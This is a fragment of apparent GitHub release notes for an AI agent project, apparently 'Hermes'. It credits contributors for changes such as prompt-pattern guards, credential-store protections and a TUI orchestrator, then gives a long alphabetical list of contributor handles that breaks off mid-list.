<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YLChen-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YLChen-007">@YLChen-007</a></strong> — Skills Guard multi-word prompt patterns</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roadhero/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roadhero">@roadhero</a></strong> — env_passthrough GHSA-rhgp-j443-p4rf filter</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zyrixtrex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zyrixtrex">@Zyrixtrex</a></strong> — Google Chat OAuth credential persistence hardening</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a></strong>, <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomqiaozc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomqiaozc">@tomqiaozc</a></strong> — defense-in-depth read-deny on credential stores</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a></strong> — control-plane file write protection</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a></strong>, <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a></strong>, <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zccyman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zccyman">@zccyman</a></strong> — auxiliary fallback ladder components</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ms-alan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ms-alan">@ms-alan</a></strong>, <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ticketclosed-wontfix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ticketclosed-wontfix">@ticketclosed-wontfix</a></strong>, <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donovan-yohan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donovan-yohan">@donovan-yohan</a></strong> — TUI session orchestrator + follow-ups</li>
<li><strong>@daimon-nous[bot]</strong> — cron per-job profile support</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bisko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bisko">@bisko</a></strong> — re-pad <code>reasoning_content</code> on cross-provider fallback</li>
</ul>
<h3>All Contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/02356abc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/02356abc">@02356abc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xchainer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xchainer">@0xchainer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xjackyang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xjackyang">@0xjackyang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsir0000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsir0000">@0xsir0000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0z1-ghb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0z1-ghb">@0z1-ghb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/8bit64k/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/8bit64k">@8bit64k</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaronlab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaronlab">@aaronlab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AceWattGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AceWattGit">@AceWattGit</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ACR27/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ACR27">@ACR27</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adam91holt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adam91holt">@adam91holt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AdamPlatin123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AdamPlatin123">@AdamPlatin123</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ade5954/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ade5954">@Ade5954</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AdityaRajeshGadgil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AdityaRajeshGadgil">@AdityaRajeshGadgil</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adybag14-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adybag14-cyber">@adybag14-cyber</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hana-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hana-ai">@ai-hana-ai</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alaamohanad169-ship-it/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alaamohanad169-ship-it">@alaamohanad169-ship-it</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alber70g/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alber70g">@alber70g</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/albert748/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/albert748">@albert748</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aqilaziz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aqilaziz">@aqilaziz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/argabor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/argabor">@argabor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asdlem/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asdlem">@asdlem</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/avifenesh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/avifenesh">@avifenesh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/awizemann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/awizemann">@awizemann</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/B0Tch1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/B0Tch1">@B0Tch1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BaxBit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BaxBit">@BaxBit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Beandon13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Beandon13">@Beandon13</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beardthelion/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beardthelion">@beardthelion</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bensargotest-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bensargotest-sys">@bensargotest-sys</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/binhnt92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/binhnt92">@binhnt92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bird/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bird">@bird</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bisko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bisko">@bisko</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlackishGreen33/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlackishGreen33">@BlackishGreen33</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/booker1207/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/booker1207">@booker1207</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradhallett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradhallett">@bradhallett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Brixyy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Brixyy">@Brixyy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brndnsvr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brndnsvr">@brndnsvr</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BROCCOLO1D/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BROCCOLO1D">@BROCCOLO1D</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/btorresgil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/btorresgil">@btorresgil</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/burjorjee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/burjorjee">@burjorjee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carltonawong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carltonawong">@carltonawong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Carry00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Carry00">@Carry00</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chaconne67/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chaconne67">@chaconne67</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chdlc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chdlc">@chdlc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chromalinx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chromalinx">@chromalinx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ChyuWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ChyuWei">@ChyuWei</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CipherFrame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CipherFrame">@CipherFrame</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cmullins70/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cmullins70">@cmullins70</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CNSeniorious000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CNSeniorious000">@CNSeniorious000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codeblackhole1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codeblackhole1024">@codeblackhole1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Codename-11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Codename-11">@Codename-11</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-chang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-chang">@colin-chang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/counterposition/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/counterposition">@counterposition</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cresslank/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cresslank">@cresslank</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CryptoByz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CryptoByz">@CryptoByz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyb0rgk1tty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyb0rgk1tty">@cyb0rgk1tty</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cybourgeoisie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cybourgeoisie">@Cybourgeoisie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daizhonggeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daizhonggeng">@daizhonggeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/darvsum/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/darvsum">@darvsum</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidcampbelldc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidcampbelldc">@davidcampbelldc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deas">@deas</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dgians/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dgians">@dgians</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dillweed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dillweed">@dillweed</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DoGMaTiiC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DoGMaTiiC">@DoGMaTiiC</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donovan-yohan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donovan-yohan">@donovan-yohan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/draplater/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/draplater">@draplater</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Drexuxux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Drexuxux">@Drexuxux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dskwe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dskwe">@dskwe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dsr-restyn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dsr-restyn">@dsr-restyn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dusterbloom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dusterbloom">@dusterbloom</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/duyua9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/duyua9">@duyua9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/egilewski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/egilewski">@egilewski</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/el-analista/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/el-analista">@el-analista</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eliteworkstation94-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eliteworkstation94-ai">@eliteworkstation94-ai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eloklam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eloklam">@eloklam</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EloquentBrush0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EloquentBrush0x">@EloquentBrush0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emonty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emonty">@emonty</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emozilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emozilla">@emozilla</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erhnysr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erhnysr">@erhnysr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erikengervall/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erikengervall">@erikengervall</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ether-btc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ether-btc">@ether-btc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EvilHumphrey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EvilHumphrey">@EvilHumphrey</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabiosiqueira/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabiosiqueira">@fabiosiqueira</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/falasi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/falasi">@falasi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/falconexe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/falconexe">@falconexe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fardoche6/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fardoche6">@fardoche6</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/felix-windsor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/felix-windsor">@felix-windsor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fewmanism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fewmanism">@Fewmanism</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ffr31mr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ffr31mr">@ffr31mr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flamiinngo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flamiinngo">@flamiinngo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flanny7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flanny7">@flanny7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flooryyyy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flooryyyy">@flooryyyy</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fonhal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fonhal">@fonhal</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/francip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/francip">@francip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujinice/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujinice">@fujinice</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gianfrancopiana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gianfrancopiana">@gianfrancopiana</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glennc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glennc">@glennc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Glucksberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Glucksberg">@Glucksberg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/godlin-gh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/godlin-gh">@godlin-gh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Grogger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Grogger">@Grogger</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guillaumemeyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guillaumemeyer">@guillaumemeyer</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/H-Ali13381/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/H-Ali13381">@H-Ali13381</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanzckernel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanzckernel">@hanzckernel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haran2001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haran2001">@haran2001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hawknewton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hawknewton">@hawknewton</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hayka-pacha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hayka-pacha">@hayka-pacha</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hehehe0803/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hehehe0803">@hehehe0803</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenkDz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenkDz">@HenkDz</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/Hermes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hermes">@Hermes</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hermesagent26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hermesagent26">@hermesagent26</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hinotoi-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hinotoi-agent">@Hinotoi-agent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hongchen1993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hongchen1993">@hongchen1993</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/honor2030/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/honor2030">@honor2030</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/houenyang-momo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/houenyang-momo">@houenyang-momo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ht1072/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ht1072">@ht1072</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hueilau/hovercard" data-octo-click="hovercard-link-click" 